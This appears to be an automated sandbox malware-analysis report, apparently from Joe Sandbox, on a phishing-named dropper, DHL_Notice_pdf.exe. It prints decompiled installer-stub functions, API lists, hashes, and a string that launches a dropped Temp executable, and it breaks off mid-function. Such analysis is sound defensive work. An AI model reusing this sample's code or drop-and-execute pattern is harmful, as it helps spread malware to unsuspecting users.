                                                            0x00000000
                                                            0x00404a02
                                                            0x00404931
                                                            0x00404937
                                                            0x00404941
                                                            0x0040494c
                                                            0x0040494f
                                                            0x00404952
                                                            0x0040495d
                                                            0x00404960
                                                            0x00404967
                                                            0x00404974
                                                            0x00404985
                                                            0x0040498b
                                                            0x00404993
                                                            0x004049a1
                                                            0x004049a7
                                                            0x004049a7
                                                            0x00404967
                                                            0x004049b1
                                                            0x00000000
                                                            0x004049bc
                                                            0x004049c0
                                                            0x004049d0
                                                            0x004049d0
                                                            0x004049d6
                                                            0x004049e2
                                                            0x004049e2
                                                            0x00000000
                                                            0x004049e6
                                                            0x004049b1
                                                            0x004048cd
                                                            0x00000000
                                                            0x004048df
                                                            0x004048e4
                                                            0x004048ea
                                                            0x00000000
                                                            0x00000000
                                                            0x00404913
                                                            0x00404915
                                                            0x0040491a
                                                            0x00000000
                                                            0x0040491a
                                                            0x004048cd
                                                            0x0040479b
                                                            0x0040479e
                                                            0x004047a3
                                                            0x004047b4
                                                            0x004047b4
                                                            0x004047bc
                                                            0x004047bf
                                                            0x004047c3
                                                            0x004047c6
                                                            0x004047ca
                                                            0x004047cd
                                                            0x004047d0
                                                            0x004047d3
                                                            0x004047da
                                                            0x004047dc
                                                            0x004047dc
                                                            0x004047e6
                                                            0x004047f3
                                                            0x004047fd
                                                            0x00404802
                                                            0x00404805
                                                            0x0040480a
                                                            0x00404821
                                                            0x00404828
                                                            0x0040483b
                                                            0x0040483e
                                                            0x00404852
                                                            0x00404859
                                                            0x0040485e
                                                            0x00404863
                                                            0x00404863
                                                            0x00404871
                                                            0x0040487f
                                                            0x00404891
                                                            0x00404896
                                                            0x004048a6
                                                            0x004048a8
                                                            0x00000000

                                                            APIs
                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
                                                            • GetDlgItem.USER32 ref: 00404835
                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                            • GetSysColor.USER32(?), ref: 00404863
                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                            • lstrlenW.KERNEL32(?), ref: 00404884
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                            • GetDlgItem.USER32 ref: 004048FF
                                                            • SendMessageW.USER32(00000000), ref: 00404906
                                                            • GetDlgItem.USER32 ref: 00404931
                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                            • SetCursor.USER32(00000000), ref: 00404985
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                            • SetCursor.USER32(00000000), ref: 004049A1
                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                            Strings
                                                            • N, xrefs: 0040491F
                                                            • "C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t, xrefs: 00404960
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                            • String ID: "C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t$N
                                                            • API String ID: 3103080414-3325198878
                                                            • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                            • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                            • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                            • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004062AE Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004062AE(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426de8 = 0x55004e;
				 *0x426dec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x4275e8
					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
						_t53 = _t52 + 0x10;
						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406113(_t24 + _t46, 0x4269e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E0040620A(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00406158(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                            0x004062ae
                                                            0x004062b7
                                                            0x004062be
                                                            0x004062c8
                                                            0x004062dc
                                                            0x00406304
                                                            0x0040630b
                                                            0x0040630f
                                                            0x00406313
                                                            0x00406333
                                                            0x0040633a
                                                            0x00406344
                                                            0x00406351
                                                            0x00406356
                                                            0x0040635b
                                                            0x0040635f
                                                            0x0040636e
                                                            0x00406370
                                                            0x0040637d
                                                            0x00406381
                                                            0x0040641c
                                                            0x00000000
                                                            0x00406397
                                                            0x004063a4
                                                            0x004063c8
                                                            0x004063cc
                                                            0x004063eb
                                                            0x004063ef
                                                            0x004063ef
                                                            0x004063f1
                                                            0x004063fa
                                                            0x00406405
                                                            0x00406410
                                                            0x00406416
                                                            0x00000000
                                                            0x00406416
                                                            0x004063ce
                                                            0x004063d1
                                                            0x004063dc
                                                            0x004063d8
                                                            0x004063da
                                                            0x004063db
                                                            0x004063db
                                                            0x004063e3
                                                            0x004063e5
                                                            0x00000000
                                                            0x004063e5
                                                            0x004063af
                                                            0x004063b5
                                                            0x00000000
                                                            0x004063b5
                                                            0x00406381
                                                            0x0040635f
                                                            0x004062de
                                                            0x004062e9
                                                            0x004062f2
                                                            0x004062f6
                                                            0x00000000
                                                            0x00000000
                                                            0x004062f6
                                                            0x00406427

                                                            APIs
                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                            • GetShortPathNameW.KERNEL32 ref: 004062F2
                                                              • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                              • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                            • GetShortPathNameW.KERNEL32 ref: 0040630F
                                                            • wsprintfA.USER32 ref: 0040632D
                                                            • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                            • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                            • GlobalFree.KERNEL32 ref: 00406416
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                                              • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\DHL_Notice_pdf.exe,80000000,00000003), ref: 0040615C
                                                              • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                            • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                            • API String ID: 2171350718-2295842750
                                                            • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                            • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                            • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                            • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 90%
                                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a270;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                            0x0040100a
                                                            0x00401039
                                                            0x00401047
                                                            0x0040104d
                                                            0x00401051
                                                            0x0040105b
                                                            0x00401061
                                                            0x00401064
                                                            0x004010f3
                                                            0x00401089
                                                            0x0040108c
                                                            0x004010a6
                                                            0x004010bd
                                                            0x004010cc
                                                            0x004010cf
                                                            0x004010d5
                                                            0x004010d9
                                                            0x004010e4
                                                            0x004010ed
                                                            0x004010ef
                                                            0x004010ef
                                                            0x00401100
                                                            0x00401105
                                                            0x0040110d
                                                            0x00401110
                                                            0x00401112
                                                            0x00401118
                                                            0x0040111f
                                                            0x00401126
                                                            0x00401130
                                                            0x00401142
                                                            0x00401156
                                                            0x00401160
                                                            0x00401165
                                                            0x00401165
                                                            0x00401110
                                                            0x0040116e
                                                            0x00000000
                                                            0x00401178
                                                            0x00401010
                                                            0x00401013
                                                            0x00401015
                                                            0x0040101f
                                                            0x0040101f
                                                            0x00000000

                                                            APIs
                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                            • GetClientRect.USER32 ref: 0040105B
                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                            • FillRect.USER32 ref: 004010E4
                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                            • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                            • String ID: F
                                                            • API String ID: 941294808-1304234792
                                                            • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                            • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                            • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                            • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004066A5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196stringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 72%
                                                            			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x42923c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x42a298 + _t44 * 2;
				_t45 = 0x428200;
				_t108 = 0x428200;
				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406668(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x428200;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E004065AF(_t108,  *0x42a268);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068EF(_t108);
							}
							goto L38;
						}
						if( *0x42a2e4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a264;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066A5(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                                                            0x004066a5
                                                            0x004066a5
                                                            0x004066a5
                                                            0x004066ab
                                                            0x004066b0
                                                            0x004066c1
                                                            0x004066c1
                                                            0x004066c9
                                                            0x004066ca
                                                            0x004066cb
                                                            0x004066cc
                                                            0x004066cf
                                                            0x004066d7
                                                            0x004066d9
                                                            0x004066ea
                                                            0x004066ed
                                                            0x004066ed
                                                            0x004066f1
                                                            0x004066f7
                                                            0x004066fa
                                                            0x004068d5
                                                            0x004068d5
                                                            0x004068e0
                                                            0x004068ec
                                                            0x004068ec
                                                            0x00000000
                                                            0x00406700
                                                            0x00406705
                                                            0x0040671a
                                                            0x0040671b
                                                            0x00406721
                                                            0x004068b3
                                                            0x004068c1
                                                            0x004068c4
                                                            0x004068c4
                                                            0x004068b5
                                                            0x004068b8
                                                            0x004068bb
                                                            0x004068bd
                                                            0x004068bd
                                                            0x004068c6
                                                            0x004068c6
                                                            0x004068cc
                                                            0x004068cf
                                                            0x00406702
                                                            0x00000000
                                                            0x00406702
                                                            0x00000000
                                                            0x004068cf
                                                            0x00406727
                                                            0x0040672a
                                                            0x00406739
                                                            0x00406740
                                                            0x0040674c
                                                            0x0040674f
                                                            0x00406752
                                                            0x00406753
                                                            0x00406758
                                                            0x0040675e
                                                            0x00406761
                                                            0x00406764
                                                            0x00406857
                                                            0x0040685c
                                                            0x0040688f
                                                            0x00406894
                                                            0x00406899
                                                            0x0040689e
                                                            0x0040689e
                                                            0x004068a3
                                                            0x004068a9
                                                            0x004068ac
                                                            0x00000000
                                                            0x004068ac
                                                            0x0040685e
                                                            0x00406861
                                                            0x00406864
                                                            0x00406879
                                                            0x00406880
                                                            0x00406866
                                                            0x0040686d
                                                            0x0040686d
                                                            0x00406888
                                                            0x0040688b
                                                            0x0040684f
                                                            0x00406850
                                                            0x00406850
                                                            0x00000000
                                                            0x0040688b
                                                            0x00406771
                                                            0x00406775
                                                            0x00406775
                                                            0x00406776
                                                            0x00406778
                                                            0x004067b5
                                                            0x004067b8
                                                            0x004067c8
                                                            0x004067cb
                                                            0x004067d3
                                                            0x004067d9
                                                            0x004067d9
                                                            0x00406834
                                                            0x00406834
                                                            0x00406836
                                                            0x00000000
                                                            0x00000000
                                                            0x004067dd
                                                            0x004067e2
                                                            0x004067e3
                                                            0x004067e5
                                                            0x004067fc
                                                            0x0040680a
                                                            0x00406810
                                                            0x00406812
                                                            0x00406830
                                                            0x00406830
                                                            0x00406830
                                                            0x00000000
                                                            0x00406830
                                                            0x00406818
                                                            0x00406821
                                                            0x00406824
                                                            0x0040682a
                                                            0x0040682e
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040682e
                                                            0x004067f6
                                                            0x004067f8
                                                            0x004067fa
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004067fa
                                                            0x00000000
                                                            0x00406834
                                                            0x004067c0
                                                            0x00000000
                                                            0x0040677a
                                                            0x00406798
                                                            0x004067a1
                                                            0x0040683e
                                                            0x00406842
                                                            0x0040684a
                                                            0x0040684a
                                                            0x00000000
                                                            0x00406842
                                                            0x004067ab
                                                            0x00406838
                                                            0x0040683c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040683c
                                                            0x00406778
                                                            0x00000000
                                                            0x00406705

                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,00000400), ref: 004067C0
                                                            • GetWindowsDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                                                            • lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                            • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: Directory$SystemWindowslstrcatlstrlen
                                                            • String ID: "C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                            • API String ID: 4260037668-4103729154
                                                            • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                            • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                                            • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                            • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004056CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004056CA(signed int _a4, WCHAR* _a8) {
